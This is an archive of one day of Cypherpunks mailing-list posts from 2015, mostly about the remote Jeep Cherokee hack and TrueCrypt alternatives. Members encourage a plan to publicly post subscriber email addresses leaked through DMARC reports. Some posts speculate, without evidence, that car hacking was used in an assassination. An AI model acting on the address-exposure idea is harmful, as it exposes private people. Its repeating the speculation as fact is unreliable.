Peter. Nicely done! -S From shelley at misanthropia.org Fri Jul 24 06:04:54 2015 From: shelley at misanthropia.org (Shelley) Date: Fri, 24 Jul 2015 06:04:54 -0700 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: <14ec0294ce8.276e.4d489027c0c4d0c1b1ca03a1f48f1ffb@misanthropia.org> References: <20150724120211.GA2562@sivokote.iziade.m$> <14ec0294ce8.276e.4d489027c0c4d0c1b1ca03a1f48f1ffb@misanthropia.org> Message-ID: <20150724130438.4E76DC00014@frontend1.nyi.internal> On July 24, 2015 5:13:46 AM Georgi Guninski wrote: > Not sure if this is true: > > http://www.wired.com/2015/07/hackers-remotely-kill-jeep-highway/ > > I was driving 70 mph on the edge of downtown St. Louis when the exploit > began to take hold. > ... > Though I hadn’t touched the dashboard, the vents in the Jeep Cherokee > started blasting cold air at the maximum setting, chilling the sweat on > my back through the in-seat climate control system. Next the radio > switched to the local hip hop station and began blaring Skee-lo at full > volume. I spun the control knob left and hit the power button, to no > avail. Then the windshield wipers turned on, and wiper fluid blurred the > glass. > ... > The result of their work was a hacking technique—what the security > industry calls a zero-day exploit—that can target Jeep Cherokees and > give the attacker wireless control, via the Internet, to any of > thousands of vehicles. > ... > I mentally congratulated myself on my courage under pressure. That’s > when they cut the transmission. > > Immediately my accelerator stopped working. > > It's true. This isn't the first time these guys have demonstrated this kind of exploit. I heard an interview with Greenberg on NPR earlier in the week. Fascinating and terrifying! -S From sdw at lig.net Fri Jul 24 08:19:24 2015 From: sdw at lig.net (Stephen D. Williams) Date: Fri, 24 Jul 2015 08:19:24 -0700 Subject: True Crypt is Not Secure In-Reply-To: References: Message-ID: <55B2577C.7070008@lig.net> Keep reading. As far as I know (and I've not paid diligently close attention to further developments after the aftermath died down, so please update my statements), the consensus is that that last update and the tongue-in-cheek directive to use Bitlocker was likely a warrant canary, i.e. they could no longer be independent and uncompromised so they burned the project, staying legal while upholding principles. However, shortly thereafter others have taken the previous public open source version, forked it, in some cases begun (and maybe finished) an audit of the code. The results of those should be usable as secure with some degree of confidence. YMMV. sdw On 7/24/15 7:46 AM, Yush Bhardwaj wrote: > BitLocker is better or I should try something else ? > > WARNING: Using TrueCrypt is not secure > > > http://krebsonsecurity.com/2014/05/true-goodbye-using-truecrypt-is-not-secure/ > > http://truecrypt.sourceforge.net/ > /* > */ > /* > */ > /* > */ > /* > */ > /* > */ > /* > */ > /*Yush Bhardwaj*/ > -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2904 bytes Desc: not available URL: From list at sysfu.com Fri Jul 24 08:24:38 2015 From: list at sysfu.com (Seth) Date: Fri, 24 Jul 2015 08:24:38 -0700 Subject: True Crypt is Not Secure In-Reply-To: References: Message-ID: On Fri, 24 Jul 2015 07:46:03 -0700, Yush Bhardwaj wrote: > BitLocker is better or I should try something else ? > > WARNING: Using TrueCrypt is not secure > > > http://krebsonsecurity.com/2014/05/true-goodbye-using-truecrypt-is-not-secure/ > > http://truecrypt.sourceforge.net/ Assuming that the platform is Windows since you mentioned BitLocker, try DiskCryptor [1] [1] https://diskcryptor.net/wiki/Main_Page From Rayzer at riseup.net Fri Jul 24 08:35:13 2015 From: Rayzer at riseup.net (Razer) Date: Fri, 24 Jul 2015 08:35:13 -0700 Subject: True Crypt is Not Secure In-Reply-To: References: Message-ID: <55B25B31.3070801@riseup.net> I believe there's a fork of Truecrypt called Veracrypt that IS being audited despite the fact that recent checkups on Truiecrypt show it to still be 'secure'. RR =-=-=-=-=-=- HTML removed on GP -=-=-=-=-=-=-= -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 819 bytes Desc: OpenPGP digital signature URL: From 4chaos.onelove at gmail.com Fri Jul 24 06:23:02 2015 From: 4chaos.onelove at gmail.com (Henry Rivera) Date: Fri, 24 Jul 2015 09:23:02 -0400 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: <20150724130438.4E76DC00014@frontend1.nyi.internal> References: <20150724120211.GA2562@sivokote.iziade.m$> <14ec0294ce8.276e.4d489027c0c4d0c1b1ca03a1f48f1ffb@misanthropia.org> <20150724130438.4E76DC00014@frontend1.nyi.internal> Message-ID: >> On July 24, 2015 5:13:46 AM Georgi Guninski wrote: >> >> Not sure if this is true: >> >> http://www.wired.com/2015/07/hackers-remotely-kill-jeep-highway/ See video of this in action here: http://www.pbs.org/newshour/bb/hacking-researchers-kill-car-engine-highway-send-message-automakers/ -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 1223 bytes Desc: not available URL: From drwho at virtadpt.net Fri Jul 24 11:34:03 2015 From: drwho at virtadpt.net (The Doctor) Date: Fri, 24 Jul 2015 11:34:03 -0700 Subject: True Crypt is Not Secure In-Reply-To: <55B25B31.3070801@riseup.net> References: <55B25B31.3070801@riseup.net> Message-ID: <55B2851B.4050207@virtadpt.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 On 07/24/2015 08:35 AM, Razer wrote: > I believe there's a fork of Truecrypt called Veracrypt that IS > being audited despite the fact that recent checkups on Truecrypt > show it to still be 'secure'. Earlier this year I spent some time talking shop with the Veracrypt developers. My takeaway from that afternoon is that they're aiming to get as many bugs shaken out as possible and update the runtime disk encryption code for newer operating system releases. I also recall discussing third party audits of their codebase, but at the time I didn't have any suggestions for anyone to contract for that purpose. - -- The Doctor [412/724/301/703/415] [ZS] PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1 WWW: https://drwho.virtadpt.net/ 10101110101111101001help i'm trapped in a bit factory01110101011010001010 -----BEGIN PGP SIGNATURE----- iQIcBAEBCgAGBQJVsoUWAAoJED1np1pUQ8RkyZUP/i7Snnn2ygu/F5Px/riPeAiy NBe8LFYawE0LEX2QZ7FlFNNgU/jNutFEVsPJw3DxiaSTn/yYYqqZGUvPLIn6FrML fPNLrVa4mU70JtuQkG4y6kabVl0HhR/98EnixBhz289k+MBBJJLQXViAMaoJsfMu 2tl1g/SQPUYA8SB7ZR5b4Va+tRq+YXFWejo/usUila+zjaaLort+KoHbzVfS8kyR KmDF18BoZDlhpum5dJv5vQ0r4XBEolviFacjlTguOqzQhdyzxpU+5BJKvHbGcJhA YWRDQClLxZiK0h/BHd/aR6gXEyVWiNkhdAOZlW4fSbMkovC1oEKcY4DaM9GE+JEc oIQWf8NJ+4itLeJAFGwbwAcWKehZtkMw1ldblr5VUJElIogAxjg97hWITygtLjRy uYSWysxBz+LlNpspCbKtZFivreLqdQ5OSBNNltk6opu92l4uktWcLzVMlYyYkkl5 TZXTgs9gkY8gUkpL7Vl7Xw6rOphMFpqsKzP0A17/Y8gjwqg4LQmcdRjqA/e8h4dw 9UYa8iQtCx1gSA9znb8a2GQT52BArQw2Y2i7o119jVLESA79QTR1NV0iUOOHrGVg z9HA+ZUbIjqZ/15lrheBrgIDovdLtrrroOAdu6CQhd0hPCx9PJDcyOdKBTq93OZ0 aIPipzQnisRvEh7b5ATn =+rZm -----END PGP SIGNATURE----- From Rayzer at riseup.net Fri Jul 24 11:52:00 2015 From: Rayzer at riseup.net (Razer) Date: Fri, 24 Jul 2015 11:52:00 -0700 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: <9A043F3CF02CD34C8E74AC1594475C73AB06CBD8@uxcn10-tdc05.UoA.auckland.ac.nz> References: <20150724120211.GA2562@sivokote.iziade.m$> <9A043F3CF02CD34C8E74AC1594475C73AB06CBD8@uxcn10-tdc05.UoA.auckland.ac.nz> Message-ID: <55B28950.9060005@riseup.net> +1 HST reference. On 07/24/2015 05:18 AM, Peter Gutmann wrote: > Georgi Guninski writes: > >> http://www.wired.com/2015/07/hackers-remotely-kill-jeep-highway/ >> >> I was driving 70 mph on the edge of downtown St. Louis when the exploit >> began to take hold. > . > I remember saying something like "I feel a bit lightheaded; maybe you should > drive..." And suddenly there was a terrible roar all around us and the sky was > full of what looked like huge bats, all swooping and screeching and diving > around the car, which was going about a hundred miles an hour with the top > down. And a voice was screaming: "Holy Jesus! What are these goddamn > animals?" > > Peter. > -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 819 bytes Desc: OpenPGP digital signature URL: From pgut001 at cs.auckland.ac.nz Fri Jul 24 05:18:01 2015 From: pgut001 at cs.auckland.ac.nz (Peter Gutmann) Date: Fri, 24 Jul 2015 12:18:01 +0000 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: <20150724120211.GA2562@sivokote.iziade.m$> References: <20150724120211.GA2562@sivokote.iziade.m$> Message-ID: <9A043F3CF02CD34C8E74AC1594475C73AB06CBD8@uxcn10-tdc05.UoA.auckland.ac.nz> Georgi Guninski writes: >http://www.wired.com/2015/07/hackers-remotely-kill-jeep-highway/ > >I was driving 70 mph on the edge of downtown St. Louis when the exploit >began to take hold. . I remember saying something like "I feel a bit lightheaded; maybe you should drive..." And suddenly there was a terrible roar all around us and the sky was full of what looked like huge bats, all swooping and screeching and diving around the car, which was going about a hundred miles an hour with the top down. And a voice was screaming: "Holy Jesus! What are these goddamn animals?" Peter. From M373 at riseup.net Fri Jul 24 10:18:07 2015 From: M373 at riseup.net (M373) Date: Fri, 24 Jul 2015 12:18:07 -0500 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: <20150724165218.GD2562@sivokote.iziade.m$> References: <20150724120211.GA2562@sivokote.iziade.m$> <14ec0294ce8.276e.4d489027c0c4d0c1b1ca03a1f48f1ffb@misanthropia.org> <20150724130438.4E76DC00014@frontend1.nyi.internal> <20150724165218.GD2562@sivokote.iziade.m$> Message-ID: <55B2734F.2010904@riseup.net> On 24-Jul-15 11:52, Georgi Guninski wrote: >> I seriously wonder if there's any assassinations that've happened with the >> use of this mechanism. (1. wait until approaching intersection at high >> speed, 2. disengage brakes + steering wheel, is probably very effective) >> > We were discussing this in chat. > Someone suggested "sooner or later sploits like this > will appear on black/gray sploits markets or even become > public". Then likely car accidents will go up and > maybe mainstream media will cry "car/hackers injure human" > (the other way is not news, it is statistics). Some conspiracists conjectured this might have happened in the fatal, fiery crash of the investigative journalist Michael Hastings in L.A., but without hard evidence it's the purview of the credulous prone to conspiracy theories rather than an actual one (of which there are many). Attacks had been publicly demonstrated by then. Such intrusions would be hard to trace (especially without access to do the forensics). If it hasn't happened yet, it will in the future. People will continue to use smart cars as it's convenient and will be entrenched and socialized in by the time hoi polloi would begin to appreciate the danger. The smart car tech will also be collecting that much more info on users in the vein of smartphones, Google, Facebook, Acxiom, and the lot. From cmagistrado at gmail.com Fri Jul 24 12:29:08 2015 From: cmagistrado at gmail.com (Chris Magistrado) Date: Fri, 24 Jul 2015 12:29:08 -0700 Subject: Quantum Cryptography Message-ID: <55B29204.6070904@gmail.com> I've been lurking for awhile, but haven't seen too much on this subject. There's this DC talk that I was thinking of attending. https://www.defcon.org/html/defcon-23/dc-23-speakers.html#Aumasson Thoughts, references or white papers<3 ? From Rayzer at riseup.net Fri Jul 24 12:44:23 2015 From: Rayzer at riseup.net (Razer) Date: Fri, 24 Jul 2015 12:44:23 -0700 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: <55B2734F.2010904@riseup.net> References: <20150724120211.GA2562@sivokote.iziade.m$> <14ec0294ce8.276e.4d489027c0c4d0c1b1ca03a1f48f1ffb@misanthropia.org> <20150724130438.4E76DC00014@frontend1.nyi.internal> <20150724165218.GD2562@sivokote.iziade.m$> <55B2734F.2010904@riseup.net> Message-ID: <55B29597.1090706@riseup.net> On 07/24/2015 10:18 AM, M373 wrote: > People will continue to use smart cars as it's convenient People will continue to use cars like this because there's no option sans restoring an older vehicle and keeping it maintained with a diminishing supply of increasingly costly parts. Eventually, in many states, those cars will be refused registrations due to 'environment', and possibly 'fuel economy'. If they're allowed to continue on the road, they'll be antique-plated and milage-per-year limited. -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 819 bytes Desc: OpenPGP digital signature URL: From odinn.cyberguerrilla at riseup.net Fri Jul 24 13:58:57 2015 From: odinn.cyberguerrilla at riseup.net (odinn) Date: Fri, 24 Jul 2015 13:58:57 -0700 Subject: Message of Concern re. CSIS action sent from Cryptostorm In-Reply-To: <0BA33818-BB04-4C82-834C-286349F65222@openmailbox.org> References: <55B07834.1000605@riseup.net> <0BA33818-BB04-4C82-834C-286349F65222@openmailbox.org> Message-ID: <55B2A711.4030809@riseup.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Just checked my e-mail and saw confirmation from keybase that @grazestorm still exists (yay) and that we are following each other (keybase's "cryptographic utopia" message), so that's good news. On the other hand I saw some messages from cryptostorm_is on twitter that (as of about 4 hours ago) "Our anchor node in Canada - 'maple' - appears to have been offlined by content oligarchy pressure. Rolling to failover capacity for cluster. " additionally, "We'll update today as we learn more; as w/ all cstorm nodes, no data nor logs are stored & FDE-subversion attacks are a fruitless exercise." Cryptostorm is resilient and will quickly bounce right back, this "maple" node is just one of many, but it was alarming to see the staff being mistreated (I assumed, temporarily detained) by an increasingly belligerent Canadian government. - -O On 07/23/2015 12:45 AM, oshwm wrote: > He's back online now, some explaining from cryptostorm soon I hope > :) > > On 23 July 2015 06:14:28 BST, odinn > wrote: Hello, > > A tweet was sent out from Cryptostorm concerning one of their > staff who was apparently taken away by the CSIS: > > https://twitter.com/cryptostorm_is/status/624070397219180544 > > The text of the tweet: > > "Core cryptostorm team member @grazestorm is currently held hostage > by rogue CSIS agents. Not a joke. Deadly serious. Please copy/RT > broadly." > > The tweet was timestamped 9:15 PM - 22 Jul 2015 > > For reference, the CSIS is the Canadian Security Intelligence > Service. > > Please keep eyes on @cryptostorm_is twitter feed and provide them > with moral and any other support you deem appropriate. Cryptostorm > are good people. > > -O > > > > - -- http://abis.io ~ "a protocol concept to enable decentralization and expansion of a giving economy, and a new social good" https://keybase.io/odinn -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQEcBAEBAgAGBQJVsqcRAAoJEGxwq/inSG8CKrYH/2dery3/SbXSIDX5fMPewCPE U2ZZlW40Na5sGL73WSlvE/kmvp4FGBqL38N2iJ3v+K8j5Wt3dULDF58mBrqMiT4e o7CKdoImQpzofPBQxxaW/mta6TZ0LrrjBneqVVTSY3fdzLfdKyb8b3VoRVvcjApV pizii4/eyH8CZAEeDPezqPWQbcX7/oBChOmDmKMKR98dyUqs0Z25fh77G3mSO7b7 4cOt0T24FeWaTgnk78QQBzy7PO+QN3zsXCndVeNmfx+3K1wOZMOSbUAS7Q4kZtOm PgDVJLAwCBbe7wgCAqYKK8MTjFowrdnhNWzXMzTaQgXweEiIwbIyiemviZc/PP0= =nmLB -----END PGP SIGNATURE----- From Rayzer at riseup.net Fri Jul 24 14:00:45 2015 From: Rayzer at riseup.net (Razer) Date: Fri, 24 Jul 2015 14:00:45 -0700 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: <55B29F01.7050105@m-o-o-t.org> References: <20150724120211.GA2562@sivokote.iziade.m$> <14ec0294ce8.276e.4d489027c0c4d0c1b1ca03a1f48f1ffb@misanthropia.org> <20150724130438.4E76DC00014@frontend1.nyi.internal> <20150724165218.GD2562@sivokote.iziade.m$> <55B2734F.2010904@riseup.net> <55B29597.1090706@riseup.net> <55B29F01.7050105@m-o-o-t.org> Message-ID: <55B2A77D.4020009@riseup.net> From offlist: On 07/24/2015 01:24 PM, Peter Fairbrother wrote: > Fiat Chrysler recalls 1.4 million cars after Jeep hack > > http://www.bbc.co.uk/news/technology-33650491 Was just cruising twitter and noticed that @Uconnect is touting the patch for their Chrysler in-car entertainment system. I suspect the lack of 'firewall' between it and the car control circuitry was similar to the problem that caused a China-base Mattel contractor to send lead-painted toys to be included in (was it BK?) 'happy meals' for kids. The problem? What the toy was going to be used for simply wasn't mentioned in the specs delivered to the contractor so they never took it into consideration to use a non-toxic coating. In this case it looks like the in-car entertainment system manufacturer simply wasn't aware of the rest of the circuitry in the vehicle, and it wasn't mentioned by Chrysler, so they never even thought about it. RR -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 819 bytes Desc: OpenPGP digital signature URL: From guninski at guninski.com Fri Jul 24 05:02:11 2015 From: guninski at guninski.com (Georgi Guninski) Date: Fri, 24 Jul 2015 15:02:11 +0300 Subject: Hackers Remotely Kill a Jeep on the Highway Message-ID: <20150724120211.GA2562@sivokote.iziade.m$> Not sure if this is true: http://www.wired.com/2015/07/hackers-remotely-kill-jeep-highway/ I was driving 70 mph on the edge of downtown St. Louis when the exploit began to take hold. ... Though I hadn’t touched the dashboard, the vents in the Jeep Cherokee started blasting cold air at the maximum setting, chilling the sweat on my back through the in-seat climate control system. Next the radio switched to the local hip hop station and began blaring Skee-lo at full volume. I spun the control knob left and hit the power button, to no avail. Then the windshield wipers turned on, and wiper fluid blurred the glass. ... The result of their work was a hacking technique—what the security industry calls a zero-day exploit—that can target Jeep Cherokees and give the attacker wireless control, via the Internet, to any of thousands of vehicles. ... I mentally congratulated myself on my courage under pressure. That’s when they cut the transmission. Immediately my accelerator stopped working. From list at sysfu.com Fri Jul 24 15:11:31 2015 From: list at sysfu.com (Seth) Date: Fri, 24 Jul 2015 15:11:31 -0700 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: <55B2734F.2010904@riseup.net> References: <20150724120211.GA2562@sivokote.iziade.m$> <14ec0294ce8.276e.4d489027c0c4d0c1b1ca03a1f48f1ffb@misanthropia.org> <20150724130438.4E76DC00014@frontend1.nyi.internal> <20150724165218.GD2562@sivokote.iziade.m$> <55B2734F.2010904@riseup.net> Message-ID: On Fri, 24 Jul 2015 10:18:07 -0700, M373 wrote: > On 24-Jul-15 11:52, Georgi Guninski wrote: >>> I seriously wonder if there's any assassinations that've happened with >>> the >>> use of this mechanism. (1. wait until approaching intersection at high >>> speed, 2. disengage brakes + steering wheel, is probably very >>> effective) >>> >> We were discussing this in chat. >> Someone suggested "sooner or later sploits like this >> will appear on black/gray sploits markets or even become >> public". Then likely car accidents will go up and >> maybe mainstream media will cry "car/hackers injure human" >> (the other way is not news, it is statistics). > > Some conspiracists conjectured this might have happened in the fatal, > fiery crash of the investigative journalist Michael Hastings in L.A., > but without hard evidence it's the purview of the credulous prone to > conspiracy theories rather than an actual one (of which there are many). Right, I mean the official story was such a credulous one, and no one in squeaky clean US power structure had any motive to eliminate an investigative journalist like Hastings. Oh those credulous conspiracy theorists with their crazy theories about assassination via car hacking. From list at sysfu.com Fri Jul 24 15:16:11 2015 From: list at sysfu.com (Seth) Date: Fri, 24 Jul 2015 15:16:11 -0700 Subject: DMARC report mailing list subscriber address leaks Message-ID: I don't know if many are aware of this (I discovered it by accident myself) but if you enable dmarc reports for your domain and mail server, you'll start to get reports back that include many lurker addresses on the Cypherpunks list. I can start posting them publicly if anyone's interested. From shelley at misanthropia.org Fri Jul 24 15:28:31 2015 From: shelley at misanthropia.org (Shelley) Date: Fri, 24 Jul 2015 15:28:31 -0700 Subject: DMARC report mailing list subscriber address leaks In-Reply-To: References: Message-ID: <20150724222815.D6297680192@frontend2.nyi.internal> On July 24, 2015 3:23:33 PM Seth wrote: > I don't know if many are aware of this (I discovered it by accident > myself) but if you enable dmarc reports for your domain and mail server, > you'll start to get reports back that include many lurker addresses on the > Cypherpunks list. > > I can start posting them publicly if anyone's interested. Nice find! Yes, it's been a while since JY posted a list of the addresses for posterity. I'm all in favor of it, before the spooks try to unsub. Anyone else? -s From guninski at guninski.com Fri Jul 24 05:32:59 2015 From: guninski at guninski.com (Georgi Guninski) Date: Fri, 24 Jul 2015 15:32:59 +0300 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: <9A043F3CF02CD34C8E74AC1594475C73AB06CBD8@uxcn10-tdc05.UoA.auckland.ac.nz> References: <20150724120211.GA2562@sivokote.iziade.m$> <9A043F3CF02CD34C8E74AC1594475C73AB06CBD8@uxcn10-tdc05.UoA.auckland.ac.nz> Message-ID: <20150724123259.GB2562@sivokote.iziade.m$> On Fri, Jul 24, 2015 at 12:18:01PM +0000, Peter Gutmann wrote: > Georgi Guninski writes: > > >http://www.wired.com/2015/07/hackers-remotely-kill-jeep-highway/ > > > >I was driving 70 mph on the edge of downtown St. Louis when the exploit > >began to take hold. > . > I remember saying something like "I feel a bit lightheaded; maybe you should > drive..." And suddenly there was a terrible roar all around us and the sky was > full of what looked like huge bats, all swooping and screeching and diving > around the car, which was going about a hundred miles an hour with the top > down. And a voice was screaming: "Holy Jesus! What are these goddamn > animals?" > > Peter. I am still waiting to buy M$ "smart house": [1] http://www.technologyreview.com/view/427806/microsofts-smart-house/ [2] http://research.microsoft.com/pubs/157701/homeos.pdf Like the rest of M$ shit, it doesn't seem very popular. From EricHernandez at openmailbox.org Fri Jul 24 15:33:47 2015 From: EricHernandez at openmailbox.org (Eric Hernandez) Date: Fri, 24 Jul 2015 15:33:47 -0700 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: References: <20150724120211.GA2562@sivokote.iziade.m$> <14ec0294ce8.276e.4d489027c0c4d0c1b1ca03a1f48f1ffb@misanthropia.org> <20150724130438.4E76DC00014@frontend1.nyi.internal> <20150724165218.GD2562@sivokote.iziade.m$> <55B2734F.2010904@riseup.net> Message-ID: "There is reason to believe that intelligence agencies for major powers -- including the United States -- know how to remotely seize control of a car. So if there were a cyber attack on the car -- and I'm not saying there was, I think whoever did it would probably get away with it." - Richard Clarke, US Counter-Terrorism Czar during Clinton and Bush. On July 24, 2015 3:11:31 PM PDT, Seth wrote: >On Fri, 24 Jul 2015 10:18:07 -0700, M373 wrote: > >> On 24-Jul-15 11:52, Georgi Guninski wrote: >>>> I seriously wonder if there's any assassinations that've happened >with >>>> the >>>> use of this mechanism. (1. wait until approaching intersection at >high >>>> speed, 2. disengage brakes + steering wheel, is probably very >>>> effective) >>>> >>> We were discussing this in chat. >>> Someone suggested "sooner or later sploits like this >>> will appear on black/gray sploits markets or even become >>> public". Then likely car accidents will go up and >>> maybe mainstream media will cry "car/hackers injure human" >>> (the other way is not news, it is statistics). >> >> Some conspiracists conjectured this might have happened in the fatal, >> fiery crash of the investigative journalist Michael Hastings in L.A., >> but without hard evidence it's the purview of the credulous prone to >> conspiracy theories rather than an actual one (of which there are >many). > >Right, I mean the official story was such a credulous one, and no one >in >squeaky clean US power structure had any motive to eliminate an >investigative journalist like Hastings. > >Oh those credulous conspiracy theorists with their crazy theories about > >assassination via car hacking. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2437 bytes Desc: not available URL: From shelley at misanthropia.org Fri Jul 24 15:35:13 2015 From: shelley at misanthropia.org (Shelley) Date: Fri, 24 Jul 2015 15:35:13 -0700 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: References: <20150724120211.GA2562@sivokote.iziade.m$> <14ec0294ce8.276e.4d489027c0c4d0c1b1ca03a1f48f1ffb@misanthropia.org> <20150724130438.4E76DC00014@frontend1.nyi.internal> <20150724165218.GD2562@sivokote.iziade.m$> <55B2734F.2010904@riseup.net> Message-ID: <20150724223457.E4F346800EB@frontend2.nyi.internal> On July 24, 2015 3:20:23 PM Seth wrote: > On Fri, 24 Jul 2015 10:18:07 -0700, M373 wrote: > > > On 24-Jul-15 11:52, Georgi Guninski wrote: > >>> I seriously wonder if there's any assassinations that've happened with > >>> the > >>> use of this mechanism. (1. wait until approaching intersection at high > >>> speed, 2. disengage brakes + steering wheel, is probably very > >>> effective) > >>> > >> We were discussing this in chat. > >> Someone suggested "sooner or later sploits like this > >> will appear on black/gray sploits markets or even become > >> public". Then likely car accidents will go up and > >> maybe mainstream media will cry "car/hackers injure human" > >> (the other way is not news, it is statistics). > > > > Some conspiracists conjectured this might have happened in the fatal, > > fiery crash of the investigative journalist Michael Hastings in L.A., > > but without hard evidence it's the purview of the credulous prone to > > conspiracy theories rather than an actual one (of which there are many). > > Right, I mean the official story was such a credulous one, and no one in > squeaky clean US power structure had any motive to eliminate an > investigative journalist like Hastings. > > Oh those credulous conspiracy theorists with their crazy theories about > assassination via car hacking. Calling something a conspiracy theory is a common disinfo tactic. We used to have to play Spot the Fed, now they out themselves... -s From coderman at gmail.com Fri Jul 24 15:36:43 2015 From: coderman at gmail.com (coderman) Date: Fri, 24 Jul 2015 15:36:43 -0700 Subject: DMARC report mailing list subscriber address leaks In-Reply-To: <20150724222815.D6297680192@frontend2.nyi.internal> References: <20150724222815.D6297680192@frontend2.nyi.internal> Message-ID: On 7/24/15, Shelley wrote: > ... I'm all in favor of it, do it! From list at sysfu.com Fri Jul 24 15:45:10 2015 From: list at sysfu.com (Seth) Date: Fri, 24 Jul 2015 15:45:10 -0700 Subject: Building a trustworthy computer OSCON talk by Matthew Garrett Message-ID: Not sure if anyone was attending OSCON today and caught this talk earlier, but if have audio or video please post. http://www.oscon.com/open-source-2015/public/schedule/detail/41536 Building a trustworthy computer Matthew Garrett (CoreOS) 11:10am–11:50am Friday, 07/24/2015 Protect D139/140 Tags: Open hardware, Tools and techniques, Geek life lifestyle Average rating: ***** (5.00, 1 rating) Rate This Session Slides: http://cdn.oreillystatic.com/en/assets/1/event/129/Building%20a%20trustworthy%20computer%20Presentation.odp Prerequisite Knowledge Some knowledge of the major components of a modern computer and how they fit together, but no detailed knowledge of firmware or hardware design is required. Description The Snowden revelations demonstrated the lengths that government agencies were willing and able to go to in order to subvert computers. But these attacks aren’t limited to state-level actors – security researchers continue to demonstrate new vulnerabilities and weaknesses that would permit sophisticated criminals to achieve the same goals. In the face of these advanced attacks, what can we do to detect and mitigate them? How can we make use of existing security features, and what changes can we make to system design? In short, how can we ensure that a user can trust that their computer is acting in their interests rather than somebody else’s? This presentation will cover some of the existing security features and recent design changes in systems that can make it easier to detect attacks, and provide mechanisms for defending against them in the first place, along with simple design changes that would make it easier for users to ensure that components haven’t been backdoored. In addition it will discuss some of the remaining challenges that don’t have solid answers as yet. Topics covered will include: Firmware security Trusted platform modules, attestation, and associated privacy risks Hardware design to support offline verification Remaining components that could act against the interests of the hardware owner Photo of Matthew Garrett Matthew Garrett CoreOS Matthew Garrett is a security developer at CoreOS, specializing in the areas where software starts knowing a little more about hardware than you’d like. He implemented much of Linux’s support for UEFI Secure Boot, does things with TPMs and has found more bugs in system firmware than he’s entirely comfortable with. From sio at tesser.org Fri Jul 24 08:47:30 2015 From: sio at tesser.org (Sharif Olorin) Date: Fri, 24 Jul 2015 15:47:30 +0000 Subject: True Crypt is Not Secure In-Reply-To: References: Message-ID: <1437752365-sup-6750@metis.syd1.tesser.org> > BitLocker is better or I should try something else ? > > WARNING: Using TrueCrypt is not secure TrueCrypt has been audited[0] and come through relatively unscathed; I'd trust it over a Microsoft product I'd need to disassemble to examine any day. Of course, in reality I just use dm-crypt. [0] https://opencryptoaudit.org/ -- OpenPGP: 6FB7 ED25 BFCF 3E22 72AE 6E8C 47D4 CE7F 6B9F DF57 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 819 bytes Desc: not available URL: From skquinn at rushpost.com Fri Jul 24 14:42:08 2015 From: skquinn at rushpost.com (Shawn K. Quinn) Date: Fri, 24 Jul 2015 16:42:08 -0500 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: <20150724165218.GD2562@sivokote.iziade.m$> References: <20150724120211.GA2562@sivokote.iziade.m$> <14ec0294ce8.276e.4d489027c0c4d0c1b1ca03a1f48f1ffb@misanthropia.org> <20150724130438.4E76DC00014@frontend1.nyi.internal> <20150724165218.GD2562@sivokote.iziade.m$> Message-ID: <1437774128.1029.2.camel@moonpatrol> On Fri, 2015-07-24 at 19:52 +0300, Georgi Guninski wrote: > btw, Who are the owners/manufacterers of this jeep? > AMC? The Jeep marque has been part of the Chrysler family of brands (the others being Chrysler, Dodge, and Ram, and previously Plymouth and Eagle) since 1987 per Wikipedia. The current corporate owner is Fiat Chrysler Automobiles (FCA) as mentioned in the article. -- Shawn K. Quinn From odinn.cyberguerrilla at riseup.net Fri Jul 24 17:14:52 2015 From: odinn.cyberguerrilla at riseup.net (odinn) Date: Fri, 24 Jul 2015 17:14:52 -0700 Subject: True Crypt is Not Secure In-Reply-To: References: Message-ID: <55B2D4FC.3040805@riseup.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 I thought that this was already answered long ago... but it keeps getting brought up from time to time. For what I consider to be the definitive answer on why you should not use TrueCrypt and what alternatives to it are, see: http://grugq.tumblr.com/post/60464139008/alternative-truecrypt-implement ations Note that from TAILS 1.0.1 they incorporated LUKS, and I recommend cryptsetup, the "Swiss Army Knife of Disk Encryption." In any event, you'll definitely want to check out this: https://github.com/bwalex/tc-play Should be helpful. - -O On 07/24/2015 07:46 AM, Yush Bhardwaj wrote: > BitLocker is better or I should try something else ? > > WARNING: Using TrueCrypt is not secure > > > http://krebsonsecurity.com/2014/05/true-goodbye-using-truecrypt-is-not - -secure/ > > http://truecrypt.sourceforge.net/ /* */ /* */ /* */ /* */ /* */ > /* */ /*Yush Bhardwaj*/ > - -- http://abis.io ~ "a protocol concept to enable decentralization and expansion of a giving economy, and a new social good" https://keybase.io/odinn -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQEcBAEBAgAGBQJVstT8AAoJEGxwq/inSG8C1OcH/1NWAA7Kmzqz5CcYs40j3Oe8 v19Wpvn6QzlqFwNxdFvxSV4c8QWUDdCtD+XBoAVby65lsDwm9x+Nd3ka0fEEep0a ssJHeeHHrNE7V7ijL8gWdZOGH9fa6mNjIEXFuRCywCaMahidBJZnq3UjTJwZ5y/T avUXmwuM1mOx/Fv9YUMch0QTVs4qMtVacECH6TCvOcXRoCzznvP+L4JESy7Pybd3 